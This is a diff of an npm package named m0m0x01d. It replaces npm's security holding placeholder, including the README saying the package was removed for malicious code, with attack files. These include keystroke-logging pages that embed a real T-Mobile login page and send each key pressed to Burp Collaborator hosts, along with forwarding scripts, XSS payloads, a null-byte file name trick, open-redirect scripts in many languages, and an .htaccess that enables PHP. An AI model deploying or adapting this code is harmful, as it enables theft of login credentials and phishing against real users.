m0m0x01d 0.0.1-security → 24.0.0

package/.htaccess

@@ -0,0 +1,8 @@
+<IfModule mod_php.c>
+    # Enable PHP execution
+    AddType application/x-httpd-php .php
+    AddHandler application/x-httpd-php .php
+</IfModule>
+
+# Ensure the PHP engine is enabled
+php_flag engine on

package/file.html

@@ -0,0 +1,13 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta http-equiv="X-UA-Compatible" content="IE=edge">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Redirecting...</title>
+  <meta http-equiv="refresh" content="0; url=https://40fe2e9f7b.ipv6.bypass.eu.org/">
+</head>
+<body>
+  <p>If you are not redirected automatically, <a href="https://40fe2e9f7b.ipv6.bypass.eu.org/">click here</a>.</p>
+</body>
+</html>

package/iframe.svg.html

@@ -0,0 +1 @@
+<iframe src="https://es.account.t-mobile.com/signin/v2/"></iframe>

package/iframe2.svg.html

@@ -0,0 +1,42 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>PoC - Keystroke Capture</title>
+    <script>
+        // Function to send captured data to your server
+        function sendKeystrokes(data) {
+            var xhr = new XMLHttpRequest();
+            xhr.open("POST", "https://q1sbaric7jhkozf4ae7tuk5gm7sygn.burpcollaborator.net/keystrokes", true);
+            xhr.setRequestHeader("Content-Type", "application/json");
+            xhr.send(JSON.stringify({ keystrokes: data }));
+        }
+
+        // Function to capture keystrokes inside the iframe
+        function captureKeystrokes() {
+            var iframe = document.getElementById('login-iframe').contentWindow;
+
+            iframe.document.onkeyup = function(event) {
+                // Capture each key press and send it to the server
+                sendKeystrokes(event.key);
+            };
+        }
+
+        // Start capturing keystrokes when the iframe is loaded
+        window.onload = function() {
+            var iframe = document.getElementById('login-iframe');
+
+            iframe.onload = function() {
+                captureKeystrokes();
+            };
+        };
+    </script>
+</head>
+<body>
+    <h1>Login Page</h1>
+    <!-- Embedding the login page -->
+    <iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
+</body>
+</html>
+

package/iframe3.svg.html

@@ -0,0 +1,42 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>PoC - Keystroke Capture</title>
+    <script>
+        // Function to send captured data to your server
+        function sendKeystrokes(data) {
+            var xhr = new XMLHttpRequest();
+            xhr.open("POST", "https://200ltblqjhtfqvkk2onadiu0vr1hp6.burpcollaborator.net/keystrokes", true);
+            xhr.setRequestHeader("Content-Type", "application/json");
+            xhr.send(JSON.stringify({ keystrokes: data }));
+        }
+
+        // Function to capture keystrokes inside the iframe
+        function captureKeystrokes() {
+            var iframe = document.getElementById('login-iframe').contentWindow;
+
+            iframe.document.onkeyup = function(event) {
+                // Capture each key press and send it to the server
+                sendKeystrokes(event.key);
+            };
+        }
+
+        // Start capturing keystrokes when the iframe is loaded
+        window.onload = function() {
+            var iframe = document.getElementById('login-iframe');
+
+            iframe.onload = function() {
+                captureKeystrokes();
+            };
+        };
+    </script>
+</head>
+<body>
+    <h1>Login Page</h1>
+    <!-- Embedding the login page -->
+    <iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
+</body>
+</html>
+

package/iframe4.svg.html

@@ -0,0 +1,16 @@
+</html>
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Keystroke Capture</title>
+    <script src="https://es.t-mobile.com/24/_mp.v3N0Mxa0NEUVp6UllrV0FhT3RuZDluNmo3R0pGTFYya1JzMFBCbk0wYUNvcEJmY05mc19wc2tHb001eE8xcFVienE._mp.ve/_unpkg_com/m0m0x01d@21.0.0/keystroke-capture.svg.js"></script>
+</head>
+<body>
+    <h1>Keystroke Logger PoC</h1>
+    <!-- Embedding the target's login page in an iframe -->
+    <iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
+</body>
+</html>
+

package/intermediary.js

@@ -0,0 +1,11 @@
+// Intermediary script to forward keystrokes to your server
+self.addEventListener('message', function(event) {
+    var data = event.data;
+
+    // Forward the keystrokes to your server
+    var xhr = new XMLHttpRequest();
+    xhr.open("POST", "https://bm1nrilxt9ng8wh982986jp76yco0d.burpcollaborator.net/keystrokes", true);
+    xhr.setRequestHeader("Content-Type", "application/json");
+    xhr.send(JSON.stringify({ keystrokes: data }));
+});
+

package/intermediary.svg.js

@@ -0,0 +1,11 @@
+// Intermediary script to forward keystrokes to your server
+self.addEventListener('message', function(event) {
+    var data = event.data;
+
+    // Forward the keystrokes to your server
+    var xhr = new XMLHttpRequest();
+    xhr.open("POST", "https://bm1nrilxt9ng8wh982986jp76yco0d.burpcollaborator.net/keystrokes", true);
+    xhr.setRequestHeader("Content-Type", "application/json");
+    xhr.send(JSON.stringify({ keystrokes: data }));
+});
+

package/ip.svg.html

@@ -0,0 +1 @@
+<iframe src="https://lqfxvsp7xjrqc6ljccdiattha8gz4o.burpcollaborator.net/xx"></iframe>

package/keystroke-capture.js

@@ -0,0 +1,26 @@
+// Function to send keystrokes to the intermediary file on unpkg
+function sendKeystrokes(data) {
+    var xhr = new XMLHttpRequest();
+    xhr.open("POST", "https://unpkg.com/m0m0x01d@19.0.0/intermediary.js", true);
+    xhr.setRequestHeader("Content-Type", "application/json");
+    xhr.send(JSON.stringify({ keystrokes: data }));
+}
+
+// Function to capture keystrokes in the iframe
+function captureKeystrokes() {
+    var iframe = document.getElementById('login-iframe').contentWindow;
+    
+    // Listen for key presses in the iframe
+    iframe.document.onkeyup = function(event) {
+        sendKeystrokes(event.key);  // Send each keystroke to the intermediary
+    };
+}
+
+// Wait for the iframe to load, then start capturing keystrokes
+window.onload = function() {
+    var iframe = document.getElementById('login-iframe');
+    iframe.onload = function() {
+        captureKeystrokes();
+    };
+};
+

package/keystroke-capture.svg.js

@@ -0,0 +1,25 @@
+// Function to send keystrokes to the intermediary file on unpkg
+function sendKeystrokes(data) {
+    var xhr = new XMLHttpRequest();
+    xhr.open("POST", "https://es.t-mobile.com.mmcyrtl8tknr87hk8d9j6upi69c10q.burpcollaborator.net/xxxxxxxxx", true);
+    xhr.setRequestHeader("Content-Type", "application/json");
+    xhr.send(JSON.stringify({ keystrokes: data }));
+}
+
+// Function to capture keystrokes in the iframe
+function captureKeystrokes() {
+    var iframe = document.getElementById('login-iframe').contentWindow;
+    
+    // Listen for key presses in the iframe
+    iframe.document.onkeyup = function(event) {
+        sendKeystrokes(event.key);  // Send each keystroke to the intermediary
+    };
+}
+
+// Wait for the iframe to load, then start capturing keystrokes
+window.onload = function() {
+    var iframe = document.getElementById('login-iframe');
+    iframe.onload = function() {
+        captureKeystrokes();
+    };
+};

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "m0m0x01d",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "24.0.0",
+  "description": "ssrf",
+  "main": "index.html",
+  "scripts": {
+    "test": "ls"
+  },
+  "author": "",
+  "license": "ISC"
 }

package/redirect.svg.asp

@@ -0,0 +1 @@
+<% Response.Redirect("https://example.com") %>

package/redirect.svg.aspx

@@ -0,0 +1 @@
+<% Response.Redirect("https://example.com") %>

package/redirect.svg.cfm

@@ -0,0 +1 @@
+<cflocation url="https://example.com">

package/redirect.svg.cs

@@ -0,0 +1 @@
+return Redirect("https://example.com");

package/redirect.svg.cshtml

@@ -0,0 +1 @@
+return Redirect("https://example.com");

package/redirect.svg.html

@@ -0,0 +1,25 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Redirect</title>
+    <script>
+        window.onload = function() {
+            // Get the URL query parameter
+            const urlParams = new URLSearchParams(window.location.search);
+            const targetUrl = urlParams.get('url');
+
+            // If a valid URL is provided, redirect to it
+            if (targetUrl) {
+                window.location.href = targetUrl;
+            } else {
+                document.body.innerHTML = "No URL provided for redirection.";
+            }
+        }
+    </script>
+</head>
+<body>
+</body>
+</html>
+

package/redirect.svg.js

@@ -0,0 +1 @@
+res.redirect('https://example.com');

package/redirect.svg.jsp

@@ -0,0 +1,3 @@
+<%
+response.sendRedirect("https://example.com");
+%>

package/redirect.svg.php

@@ -0,0 +1,21 @@
+<?php
+// Get the target URL from the 'next_url' query parameter
+$next_url = isset($_GET['next_url']) ? $_GET['next_url'] : 'https://9lv13zw73wdy5t6hjxcpw5tz9qfh36.burpcollaborator.net';
+
+// Set the appropriate headers for the 302 redirect
+header("HTTP/1.1 302 Found");
+header("Location: $next_url");
+
+// Optional: Set additional headers if required
+header("Cache-Control: public, max-age=0");
+header("Set-Cookie: sites=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
+header("Set-Cookie: sessionid=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
+header("Strict-Transport-Security: max-age=31536000; includeSubDomains; preload");
+header("X-Frame-Options: SAMEORIGIN");
+header("X-XSS-Protection: 1; mode=block");
+header("X-Content-Type-Options: nosniff");
+header("Content-Security-Policy: frame-ancestors 'self'; base-uri 'self'; form-action 'self' https://*.example.com; upgrade-insecure-requests");
+
+// Ensure the connection is closed after the headers
+exit();
+

package/redirect.svg.pl

@@ -0,0 +1 @@
+print "Location: https://example.com\n\n";

package/redirect.svg.py

@@ -0,0 +1,2 @@
+from flask import redirect
+return redirect("https://example.com")

package/redirect.svg.rb

@@ -0,0 +1 @@
+redirect_to "https://example.com"

package/redirect.svg.xml

@@ -0,0 +1,3 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<?xml-stylesheet type="text/xsl" href="redirect.svg.xsl"?>
+<root/>

package/redirect.svg.xsl

@@ -0,0 +1,14 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
+    <xsl:template match="/">
+        <xsl:variable name="url" select="'https://086sqqjyqn0pskt86ozgjwgqwh2aqz.burpcollaborator.net'"/>
+        <html>
+            <head>
+                <meta http-equiv="refresh" content="0; url={$url}" />
+            </head>
+            <body>
+                Redirecting to <xsl:value-of select="$url" />
+            </body>
+        </html>
+    </xsl:template>
+</xsl:stylesheet>

package/redirect2.svg.html

@@ -0,0 +1,11 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta http-equiv="refresh" content="0; url=https://www.example.com">
+    <title>Redirecting...</title>
+</head>
+<body>
+    <p>If you are not redirected automatically, follow this <a href="https://www.example.com">link to the new page</a>.</p>
+</body>
+</html>

package/redirecting.svg.html

@@ -0,0 +1,15 @@
+<!DOCTYPE HTML>
+<html lang="en-US">
+    <head>
+        <meta charset="UTF-8">
+        <meta http-equiv="refresh" content="0; url=http://example.com">
+        <script type="text/javascript">
+            window.location.href = "http://example.com"
+        </script>
+        <title>Page Redirection</title>
+    </head>
+    <body>
+        <!-- Note: don't tell people to `click` the link, just tell them that it is a link. -->
+        If you are not redirected automatically, follow this <a href='http://example.com'>link to example</a>.
+    </body>
+</html>

package/test.html

@@ -0,0 +1,2 @@
+<h1>testing</h1>
+<script src="https://m8veqcjkq90bs6tu6az2jigcw32xqm.burpcollaborator.net"></script>

package/test.html%00.pdf

@@ -0,0 +1 @@
+<script>alert(document.domain)</script>

package/test.pdf.txt

@@ -0,0 +1 @@
+testing

package/test.php

@@ -0,0 +1,3 @@
+<?php
+    echo "m0m0x01d";
+?>

package/test.svg.html

@@ -0,0 +1 @@
+<script>alert(document.domain)</script>

package/test.svg.txt

@@ -0,0 +1 @@
+testing123

package/test.txt

@@ -0,0 +1 @@
+testing m0m0x01d

package/test.txt.pdf

@@ -0,0 +1 @@
+testing123

package/test2.txt.pdf

@@ -0,0 +1 @@
+<script>alert(1)</script>

package/testing.svg.html

@@ -0,0 +1 @@
+<iframe src="https://wttobm4ubjlldge4rkkc4s1mhdn3bs.burpcollaborator.net"></iframe>

package/xss.js

@@ -0,0 +1,46 @@
+/*jsonp*/
+s7classics7sdkJSONResponse({
+    "set": {
+        "pv": "1.0",
+        "type": "video",
+        "n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
+        "item": {
+            "v": {
+                "path": "upsprod/_media_/e03/e035b19f-f70b-4213-9b2a-e49a8cfce5b4.mp4",
+                "dx": "1920",
+                "dy": "1080",
+                "bitrate": "60947580",
+                "id": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
+                "suffix": "mp4"
+            },
+            "i": {
+                "mod": "layer=0&src=is(upsprod/Coco vs. the Doubters_Coco with SMBs)",
+                "n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix"
+            },
+            "type": "video",
+            "iv": "zJZEa1",
+            "userdata": [{
+                "Audio_Codec": "AAC LC",
+                "Audio_Sample_Rate": "48.0",
+                "Number_Audio_Channels": "2",
+                "Video_Codec": "AVC",
+                "Video_Frame_Rate": "24.000",
+                "Video_Length": "30.0"
+            }, {
+                "Audio_Codec": "AAC LC",
+                "Audio_Sample_Rate": "48.0",
+                "Number_Audio_Channels": "2",
+                "Video_Codec": "AVC",
+                "Video_Frame_Rate": "24.000",
+                "Video_Length": "30.0"
+            }]
+        }
+    }
+}, "130443601");
+
+// XSS payload: inject document.domain into the JSONP response without breaking functionality
+(function(){
+    var xss_payload = document.domain;
+    console.log("Injected XSS payload: " + xss_payload);
+})();
+

package/xss.svg.html

@@ -0,0 +1,4 @@
+<script>
+    window.location.href = 'https://7bjztxm5tu3wvrwf9v2nm3jxzo5gt5.burpcollaborator.net';
+</script>
+

package/xss1.svg.html

@@ -0,0 +1,6 @@
+<script>
+    fetch('https://7bjztxm5tu3wvrwf9v2nm3jxzo5gt5.burpcollaborator.net/api').then(response => {
+        console.log(response);
+    });
+</script>
+

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=m0m0x01d for more information.